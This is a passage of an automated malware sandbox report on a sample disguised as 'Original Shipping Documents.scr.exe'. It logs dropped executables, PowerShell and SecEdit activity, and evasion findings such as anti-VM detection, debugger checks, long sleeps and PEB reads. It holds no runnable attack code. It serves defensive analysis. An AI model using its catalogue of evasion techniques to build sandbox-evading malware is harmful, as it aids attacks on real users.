Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\xHOAJKcJeCXuc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\xHOAJKcJeCXuc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\xHOAJKcJeCXuc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\xHOAJKcJeCXuc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\xHOAJKcJeCXuc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\xHOAJKcJeCXuc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\xHOAJKcJeCXuc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\xHOAJKcJeCXuc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\xHOAJKcJeCXuc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\xHOAJKcJeCXuc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\xHOAJKcJeCXuc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\xHOAJKcJeCXuc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\xHOAJKcJeCXuc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\xHOAJKcJeCXuc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\xHOAJKcJeCXuc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\xHOAJKcJeCXuc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\xHOAJKcJeCXuc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\xHOAJKcJeCXuc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\xHOAJKcJeCXuc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\xHOAJKcJeCXuc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\xHOAJKcJeCXuc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\xHOAJKcJeCXuc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\xHOAJKcJeCXuc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\xHOAJKcJeCXuc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\xHOAJKcJeCXuc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\xHOAJKcJeCXuc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\xHOAJKcJeCXuc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\xHOAJKcJeCXuc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\xHOAJKcJeCXuc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\xHOAJKcJeCXuc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\xHOAJKcJeCXuc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\xHOAJKcJeCXuc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\xHOAJKcJeCXuc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\xHOAJKcJeCXuc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\xHOAJKcJeCXuc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\xHOAJKcJeCXuc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\xHOAJKcJeCXuc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\xHOAJKcJeCXuc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\xHOAJKcJeCXuc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\xHOAJKcJeCXuc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\xHOAJKcJeCXuc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\xHOAJKcJeCXuc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\SecEdit.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\SecEdit.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\SecEdit.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\SecEdit.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\SecEdit.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX

Malware Analysis System Evasion

Yara detected AntiVM3

Source: Yara match	File source: Process Memory Space: Original Shipping Documents.scr.exe PID: 8004, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: xHOAJKcJeCXuc.exe PID: 7516, type: MEMORYSTR

Switches to a custom stack to bypass stack traces

Source: C:\Windows\SysWOW64\SecEdit.exe	API/Special instruction interceptor: Address: 7FFCC372D324
Source: C:\Windows\SysWOW64\SecEdit.exe	API/Special instruction interceptor: Address: 7FFCC372D7E4
Source: C:\Windows\SysWOW64\SecEdit.exe	API/Special instruction interceptor: Address: 7FFCC372D944
Source: C:\Windows\SysWOW64\SecEdit.exe	API/Special instruction interceptor: Address: 7FFCC372D504
Source: C:\Windows\SysWOW64\SecEdit.exe	API/Special instruction interceptor: Address: 7FFCC372D544
Source: C:\Windows\SysWOW64\SecEdit.exe	API/Special instruction interceptor: Address: 7FFCC372D1E4
Source: C:\Windows\SysWOW64\SecEdit.exe	API/Special instruction interceptor: Address: 7FFCC3730154
Source: C:\Windows\SysWOW64\SecEdit.exe	API/Special instruction interceptor: Address: 7FFCC372DA44

Allocates memory with a write watch (potentially for evading sandboxes)

Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Memory allocated: 2F20000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Memory allocated: 3010000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Memory allocated: 2F20000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Memory allocated: 9E60000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Memory allocated: 7730000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Memory allocated: AE60000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Memory allocated: BE60000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Memory allocated: C4A0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Memory allocated: D4A0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\xHOAJKcJeCXuc.exe	Memory allocated: 1240000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\xHOAJKcJeCXuc.exe	Memory allocated: 2FD0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\xHOAJKcJeCXuc.exe	Memory allocated: 1410000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\xHOAJKcJeCXuc.exe	Memory allocated: 8CD0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\xHOAJKcJeCXuc.exe	Memory allocated: 9CD0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\xHOAJKcJeCXuc.exe	Memory allocated: 9EC0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\xHOAJKcJeCXuc.exe	Memory allocated: AEC0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\xHOAJKcJeCXuc.exe	Memory allocated: B5A0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\xHOAJKcJeCXuc.exe	Memory allocated: C5A0000 memory reserve \| memory write watch	Jump to behavior

Contains functionality for execution timing, often used to detect debuggers

Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe

Code function: 8_2_01A8096E rdtsc

8_2_01A8096E

Contains long sleeps (>= 3 min)

Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\AppData\Roaming\xHOAJKcJeCXuc.exe	Thread delayed: delay time: 922337203685477	Jump to behavior

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 7922	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 1808	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 8422	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 1265	Jump to behavior
Source: C:\Windows\SysWOW64\SecEdit.exe	Window / User API: threadDelayed 1452
Source: C:\Windows\SysWOW64\SecEdit.exe	Window / User API: threadDelayed 8521

Found large amount of non-executed APIs

Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	API coverage: 0.7 %
Source: C:\Users\user\AppData\Roaming\xHOAJKcJeCXuc.exe	API coverage: 0.3 %

May sleep (evasive loops) to hinder dynamic analysis

Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe TID: 8024	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7212	Thread sleep count: 7922 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7212	Thread sleep count: 1808 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7184	Thread sleep time: -8301034833169293s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7512	Thread sleep time: -11990383647911201s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\xHOAJKcJeCXuc.exe TID: 7820	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\SecEdit.exe TID: 7208	Thread sleep count: 1452 > 30
Source: C:\Windows\SysWOW64\SecEdit.exe TID: 7208	Thread sleep time: -2904000s >= -30000s
Source: C:\Windows\SysWOW64\SecEdit.exe TID: 7208	Thread sleep count: 8521 > 30
Source: C:\Windows\SysWOW64\SecEdit.exe TID: 7208	Thread sleep time: -17042000s >= -30000s
Source: C:\Program Files (x86)\fgJkuavujWhdydWUgAnvsfqKzPnxpZWUEwvbYqNLcUuK\xBk0IlKjg.exe TID: 7268	Thread sleep time: -55000s >= -30000s
Source: C:\Program Files (x86)\fgJkuavujWhdydWUgAnvsfqKzPnxpZWUEwvbYqNLcUuK\xBk0IlKjg.exe TID: 7268	Thread sleep time: -40500s >= -30000s

Sample execution stops while process was sleeping (likely an evasion)

Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\SysWOW64\SecEdit.exe	Last function: Thread delayed
Source: C:\Windows\SysWOW64\SecEdit.exe	Last function: Thread delayed

Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\AppData\Roaming\xHOAJKcJeCXuc.exe	Thread delayed: delay time: 922337203685477	Jump to behavior

Source: Original Shipping Documents.scr.exe, 00000000.00000002.1477840807.0000000009960000.00000004.08000000.00040000.00000000.sdmp	Binary or memory string: qeMUJJWMAS
Source: SecEdit.exe, 00000010.00000002.3849651901.0000000002A1D000.00000004.00000020.00020000.00000000.sdmp, xBk0IlKjg.exe, 00000011.00000002.3849327859.0000000000C79000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 00000014.00000002.2057427716.0000020FC398C000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll

Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe

Process information queried: ProcessInformation

Jump to behavior

Checks if the current process is being debugged

Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Roaming\xHOAJKcJeCXuc.exe	Process queried: DebugPort
Source: C:\Windows\SysWOW64\SecEdit.exe	Process queried: DebugPort

Contains functionality for execution timing, often used to detect debuggers

Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe

Code function: 8_2_01A8096E rdtsc

8_2_01A8096E

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe

Code function: 8_2_00417A63 LdrLoadDll,

8_2_00417A63

Contains functionality to read the PEB

Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Code function: 8_2_01AFC188 mov eax, dword ptr fs:[00000030h]	8_2_01AFC188
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Code function: 8_2_01AFC188 mov eax, dword ptr fs:[00000030h]	8_2_01AFC188
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Code function: 8_2_01A80185 mov eax, dword ptr fs:[00000030h]	8_2_01A80185
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Code function: 8_2_01AE4180 mov eax, dword ptr fs:[00000030h]	8_2_01AE4180
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Code function: 8_2_01AE4180 mov eax, dword ptr fs:[00000030h]	8_2_01AE4180
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Code function: 8_2_01AC019F mov eax, dword ptr fs:[00000030h]	8_2_01AC019F
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Code function: 8_2_01AC019F mov eax, dword ptr fs:[00000030h]	8_2_01AC019F
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Code function: 8_2_01AC019F mov eax, dword ptr fs:[00000030h]	8_2_01AC019F
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Code function: 8_2_01AC019F mov eax, dword ptr fs:[00000030h]	8_2_01AC019F
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Code function: 8_2_01A3A197 mov eax, dword ptr fs:[00000030h]	8_2_01A3A197
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Code function: 8_2_01A3A197 mov eax, dword ptr fs:[00000030h]	8_2_01A3A197
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Code function: 8_2_01A3A197 mov eax, dword ptr fs:[00000030h]	8_2_01A3A197
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Code function: 8_2_01B161E5 mov eax, dword ptr fs:[00000030h]	8_2_01B161E5
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Code function: 8_2_01A701F8 mov eax, dword ptr fs:[00000030h]	8_2_01A701F8
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Code function: 8_2_01B061C3 mov eax, dword ptr fs:[00000030h]	8_2_01B061C3
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Code function: 8_2_01B061C3 mov eax, dword ptr fs:[00000030h]	8_2_01B061C3
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Code function: 8_2_01ABE1D0 mov eax, dword ptr fs:[00000030h]	8_2_01ABE1D0
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Code function: 8_2_01ABE1D0 mov eax, dword ptr fs:[00000030h]	8_2_01ABE1D0
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Code function: 8_2_01ABE1D0 mov ecx, dword ptr fs:[00000030h]	8_2_01ABE1D0
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Code function: 8_2_01ABE1D0 mov eax, dword ptr fs:[00000030h]	8_2_01ABE1D0
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Code function: 8_2_01ABE1D0 mov eax, dword ptr fs:[00000030h]	8_2_01ABE1D0
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Code function: 8_2_01A70124 mov eax, dword ptr fs:[00000030h]	8_2_01A70124
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Code function: 8_2_01AEE10E mov eax, dword ptr fs:[00000030h]	8_2_01AEE10E
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Code function: 8_2_01AEE10E mov ecx, dword ptr fs:[00000030h]	8_2_01AEE10E
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Code function: 8_2_01AEE10E mov eax, dword ptr fs:[00000030h]	8_2_01AEE10E
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Code function: 8_2_01AEE10E mov eax, dword ptr fs:[00000030h]	8_2_01AEE10E
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Code function: 8_2_01AEE10E mov ecx, dword ptr fs:[00000030h]	8_2_01AEE10E
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Code function: 8_2_01AEE10E mov eax, dword ptr fs:[00000030h]	8_2_01AEE10E
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Code function: 8_2_01AEE10E mov eax, dword ptr fs:[00000030h]	8_2_01AEE10E
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Code function: 8_2_01AEE10E mov ecx, dword ptr fs:[00000030h]	8_2_01AEE10E
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Code function: 8_2_01AEE10E mov eax, dword ptr fs:[00000030h]	8_2_01AEE10E
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Code function: 8_2_01AEE10E mov ecx, dword ptr fs:[00000030h]	8_2_01AEE10E
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Code function: 8_2_01B00115 mov eax, dword ptr fs:[00000030h]	8_2_01B00115
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Code function: 8_2_01AEA118 mov ecx, dword ptr fs:[00000030h]	8_2_01AEA118
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Code function: 8_2_01AEA118 mov eax, dword ptr fs:[00000030h]	8_2_01AEA118
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Code function: 8_2_01AEA118 mov eax, dword ptr fs:[00000030h]	8_2_01AEA118
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Code function: 8_2_01AEA118 mov eax, dword ptr fs:[00000030h]	8_2_01AEA118
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Code function: 8_2_01AD4144 mov eax, dword ptr fs:[00000030h]	8_2_01AD4144
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Code function: 8_2_01AD4144 mov eax, dword ptr fs:[00000030h]	8_2_01AD4144
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Code function: 8_2_01AD4144 mov ecx, dword ptr fs:[00000030h]	8_2_01AD4144
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Code function: 8_2_01AD4144 mov eax, dword ptr fs:[00000030h]	8_2_01AD4144
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Code function: 8_2_01AD4144 mov eax, dword ptr fs:[00000030h]	8_2_01AD4144
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Code function: 8_2_01A46154 mov eax, dword ptr fs:[00000030h]	8_2_01A46154
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Code function: 8_2_01A46154 mov eax, dword ptr fs:[00000030h]	8_2_01A46154
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Code function: 8_2_01A3C156 mov eax, dword ptr fs:[00000030h]	8_2_01A3C156
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Code function: 8_2_01AD8158 mov eax, dword ptr fs:[00000030h]	8_2_01AD8158
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Code function: 8_2_01AD80A8 mov eax, dword ptr fs:[00000030h]	8_2_01AD80A8
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Code function: 8_2_01B060B8 mov eax, dword ptr fs:[00000030h]	8_2_01B060B8
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Code function: 8_2_01B060B8 mov ecx, dword ptr fs:[00000030h]	8_2_01B060B8
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Code function: 8_2_01A4208A mov eax, dword ptr fs:[00000030h]	8_2_01A4208A
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Code function: 8_2_01A3A0E3 mov ecx, dword ptr fs:[00000030h]	8_2_01A3A0E3
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Code function: 8_2_01AC60E0 mov eax, dword ptr fs:[00000030h]	8_2_01AC60E0
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Code function: 8_2_01A480E9 mov eax, dword ptr fs:[00000030h]	8_2_01A480E9
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Code function: 8_2_01A3C0F0 mov eax, dword ptr fs:[00000030h]	8_2_01A3C0F0
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Code function: 8_2_01A820F0 mov ecx, dword ptr fs:[00000030h]	8_2_01A820F0
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Code function: 8_2_01AC20DE mov eax, dword ptr fs:[00000030h]	8_2_01AC20DE
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Code function: 8_2_01A3A020 mov eax, dword ptr fs:[00000030h]	8_2_01A3A020
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Code function: 8_2_01A3C020 mov eax, dword ptr fs:[00000030h]	8_2_01A3C020
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Code function: 8_2_01AD6030 mov eax, dword ptr fs:[00000030h]	8_2_01AD6030
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Code function: 8_2_01AC4000 mov ecx, dword ptr fs:[00000030h]	8_2_01AC4000
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Code function: 8_2_01AE2000 mov eax, dword ptr fs:[00000030h]	8_2_01AE2000
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Code function: 8_2_01AE2000 mov eax, dword ptr fs:[00000030h]	8_2_01AE2000
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Code function: 8_2_01AE2000 mov eax, dword ptr fs:[00000030h]	8_2_01AE2000
